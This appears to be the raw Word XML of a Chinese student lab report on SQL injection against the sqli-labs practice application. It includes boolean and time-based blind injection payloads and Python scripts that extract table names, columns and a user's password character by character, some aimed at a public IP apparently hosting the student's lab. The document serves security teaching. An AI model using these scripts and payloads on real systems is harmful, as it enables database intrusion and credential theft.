        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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可以初步猜测，sql语句正常执行并查出了结果则回显You are in，否则无任何回显。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利用这个布尔特性我们可以构造特殊的payload来获取数据库中的其他信息。比如：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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1' and 1=if((substr(version(),1,1))='4',1,2) --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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PS：if(表达式,表达式为true时的结果,表达式为false的结果)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上面payload的意思即为：version()获取数据库版本的字符串，substr(xxx,1,1)取得了该字符串的第二位开始的第一个字符（下标从0开始算第一位）。如果该字符为4，则if表达式返回的结果为1否则为2。 根据and 1=if(xxxx)可知道当返回1时sql语句执行成功，相当于就是id=1的查询结果，否则sql执行失败。这样我们就得到了一种sql语句执行的"判断标准"，这个也就是盲注的本质。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请自行实验通过布尔盲注注入获取superman用户的密码。（请参考5.3.5节的exp编写和5.5.4时间盲注给出的脚本）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>先贴出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>Payload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856"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr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>def leak_length(which: int):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urls = []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url = "http://47.115.154.103:8848/Less-1/?id=-1' or " \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"{}=(select length(group_concat(table_name)) from information_schema.tables where " \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"table_schema=database()); --+" \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""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urls.append(url)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url = "http://47.115.154.103:8848/Less-1/?id=-1' or " \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"{}=(select length(group_concat(column_name)) from information_schema.columns where " \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"table_name='users'); --+" \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""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urls.append(url)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url = "http://47.115.154.103:8848/Less-1/?id=-1' or " \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"{}=(select length(group_concat(username)) from users); --+" \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""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urls.append(url)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for i in range(0, 100):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url = urls[which].format(i)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res = requests.get(url=url)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if "Dumb" in res.text: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print(i, end="")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break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>def leak_table_name():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for i in range(29):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for j in string.printable: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data = ord(j)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# print(data)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url = "http://47.115.154.103:8848/Less-1/?id=-1' or " \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      "{0}=(select ascii(substr((select group_concat(table_name) " \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      "from information_schema.tables where " \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      "table_schema=database()), {1}, 1))); --+".format(data, i)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res = requests.get(url=url)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if "Dumb" in res.text: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    print(j, end="")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    break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print()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>def leak_column_name():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for i in range(20):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for j in string.printable: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data = ord(j)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url = "http://47.115.154.103:8848/Less-1/?id=-1' or " \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      "{0}=(select ascii(substr((select group_concat(column_name) " \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      "from information_schema.columns where " \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      "table_name='users'), {1}, 1))); --+".format(data, i)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res = requests.get(url=url)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if "Dumb" in res.text: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    print(j, end="")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    break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print()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>def leak_data():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for i in range(1, 9):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for j in string.printable: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data = ord(j)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/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w: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>url = "http://47.115.154.103:8848/Less-1/?id=-1' or " \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      "{0}=(select ascii(substr((select group_concat(password) " \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      "from users where " \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      "username='Dummy'), {1}, 1))); --+".format(data, i)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res = requests.get(url=url)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if "Dumb" in res.text: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    print(j, end="")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            break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print()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>def bool_based_sql_injection() -&gt; None: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# leak_length()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# table_name length == 29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# leak_table_name()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# leak_length()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# column_name length == 20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# column_name_admin length == 91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# leak_data()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  <w:t xml:space="preserve">    pass</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="27"/>
              <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="27"/>
              <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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一般来说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>先泄漏需要爆破的数据的长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>是一个好的选择</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="3357880"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2032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35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Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>然后通过泄漏的长度去逐字符爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="3357880"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2032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35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通常来说这种方法爆破比较慢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>可以采用二分爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>二分查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>和二进制爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>(substr(lpad(bin())))，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>这里由于数据较小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>没有采用这些方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.5.4</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时间盲注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与布尔盲注类似，时间盲注只是将”判断标准“换成了延时。在mysql中我们可以利用函数sleep()进行延时。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以less-10为例：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首先测试id=-1 以及id =1、2、3...发现无论执行结果如何，回显的页面都一样，此时我们不能再进行布尔盲注，只能换成以响应时间为标准的时间盲注。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接着我们简单测试：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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id=1' and 1=if(1,sleep(4),1) --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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分析payload，if(1,sleep(4),1)可以知道mysql会执行sleep(4)函数，至于执行完的返回结果我们不再关心。（延时目的以达到，即不需要1=if(xxx)而是直接if函数也可以，总之不违反mysql语法即可）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经过分析页面应该延时，但此处并没有延时，此时我们需要考虑的是”是否存在注入“。换一句话说是否能够”构造闭合再注入其他的语句“。于是我们回到闭合上来，less-10的名称其实也告诉我们了是双引号闭合。在真实环境中我们往往无法得知，因此需要多次尝试（尝试的内容有单引号、双引号、括号等等）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此时我们只需要简单更改布尔盲注的payload：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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id=1" and 1=if((substr(version(),sleep(4),1))='4',1,2) --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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334000" cy="35052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096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jc w:val="center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图5.5-8 浏览器请求延时效果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我们可以看到标签页的左端，网页加载时"卡住"的状态表示后端正在执行延时操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="20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下面通过时间盲注注入获取superman用户的密码的脚本，请理解并运行代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>样例代码：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c>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr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i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mport requests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import time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url = "http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id="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string = "abcdefghijklmnopqrstuvwxyz -ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890:_@,\{\}."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>while True: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    payload = "1\" and if((ascii(mid((select group_concat(schema_name) from information_schema.schemata),{},1))={}),sleep(4),1)--+"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    #payload = "1\" and if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}),sleep(4),1)"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    #payload = "1\" and if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='Look_here'),{},1))={}),sleep(4),1)"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    #payload = "1\" and if((ascii(mid((select * from Look_here limit 1),{},1))={}),sleep(4),1)"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    get = ""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    for i in range(1,1000):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        for j in string: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            parm = payload.format(str(i),str(ord(j)))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            try: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                response = requests.get(url+parm,timeout=3)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                #print(url+parm)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            except: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                get+=j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                print(get)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                time.sleep(1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">                break</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>我的代码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856"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr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>def time_based_leak_length(which):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urls = []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url = "http://47.115.154.103:8848/Less-1/?id=1' and"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" if({}=(select length(group_concat(table_name))"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" from information_schema.tables"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" where table_schema=database()),"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" sleep(4), 1); --+"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urls.append(url)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url = "http://47.115.154.103:8848/Less-1/?id=1' and"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" if({}=(select length(group_concat(column_name))"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" from information_schema.columns"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" where table_name='users'),"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" sleep(4), 1); --+"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urls.append(url)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url = "http://47.115.154.103:8848/Less-1/?id=1' and"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" if({}=(select length(group_concat(password))"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" from users"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" where username='Dummy'),"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" sleep(4), 1); --+"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urls.append(url)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for i in range(0, 40):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url = urls[which].format(i)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try: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res = requests.get(url=url, timeout=3)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except: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print(i)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break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>def time_based_leak_table():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for i in range(1, 30):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for j in string.printable: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data = ord(j)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url = "http://47.115.154.103:8848/Less-1/?id=1' and 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      "if({0}=(select ascii(substr((select group_concat(table_name) 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      "from information_schema.tables where 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      "table_schema=database()), {1}, 1))), sleep(4), 1); --+".format(data, i)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try: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    res = requests.get(url=url, timeout=3)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except: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    print(j, end="")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    break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print()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>def time_based_leak_columns():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for i in range(1, 21):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for j in string.printable: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data = ord(j)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url = "http://47.115.154.103:8848/Less-1/?id=1' and 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      "if({0}=(select ascii(substr((select group_concat(column_name) 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      "from information_schema.columns where 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      "table_name='users'), {1}, 1))), sleep(4), 1); --+".format(data, i)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try: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    res = requests.get(url=url, timeout=3)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except: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    print(j, end="")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    break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print()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>def time_based_leak_data():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for i in range(1, 9):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for j in string.printable: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data = ord(j)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url = "http://47.115.154.103:8848/Less-1/?id=1' and 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      "if({0}=(select ascii(substr((select group_concat(password) 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      "from users where " \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      "username='Dummy'), {1}, 1))), sleep(4), 1); --+".format(data, i)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try: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    res = requests.get(url=url, timeout=3)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except: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    print(j, end="")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            break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print()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>def time_based_injection():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# table_name length == 29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# time_based_leak_table()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# time_based_leak_length(0)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# column_name length == 20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# time_based_leak_columns()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# time_based_leak_length()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# Dummy`s password length == 8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time_based_leak_data()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pass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  <w:t xml:space="preserve">    # time_based_leak_length()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:eastAsia="zh-Hans"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>爆破的方法和布尔盲注相同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>其实二者都是在判断为true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>false的时候会产生不同的显现进行判断的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:kern w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.6 思考题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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为什么需要用mysql5的环境而mysql7+不能用呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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从PHP5.0开始mysql_connect()就不推荐使用了，到PHP7.0就直接被废弃了，如果PHP为7.0及以上版本的话用mysqli_connect()代替</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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注入的基本流程？（关于information_schema的基本使用流程，以及什么时候这个不适用？）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   `information_schema.tables -&gt; information_schema.columns -&gt; select column from table`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   Mysql5 以上才有（</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   关键字被过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-   权限不够，默认对所有用户开放</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr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5478145" cy="2969260"/>
            <wp:effectExtent l="0" t="0" r="8255" b="254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rPr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pStyle w:val="2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union注入确定列的方法？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   `union select 1,2,3,...`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   `order by`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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-   `group by`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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如果想利用updatexml进行注入需要注意什么（有多少说多少）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   mysql5 以上才有（</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   开头的字符不能是xml格式的语法字符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   updatexml的最大长度是32位的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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-   有报错注入（</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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盲注中我们提到了条件函数，除了if还有什么方法能够达到"条件控制"的效果？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   ifnull</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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-   Case</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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时间盲注中除了sleep还能够利用其他的哪些方法造成延时？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   sleep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   benchmark(t,exp) -&gt; 重复执行某表达式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   笛卡尔积  -&gt; 连接是很耗时间的一个操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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-   GET_LOCK()  -&gt; 独立锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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-   RLIKE正则 -&gt; 通过`rpad`或`repeat`构造长字符串，加以计算量大的pattern，通过repeat的参数可以控制延时长短</w:t>
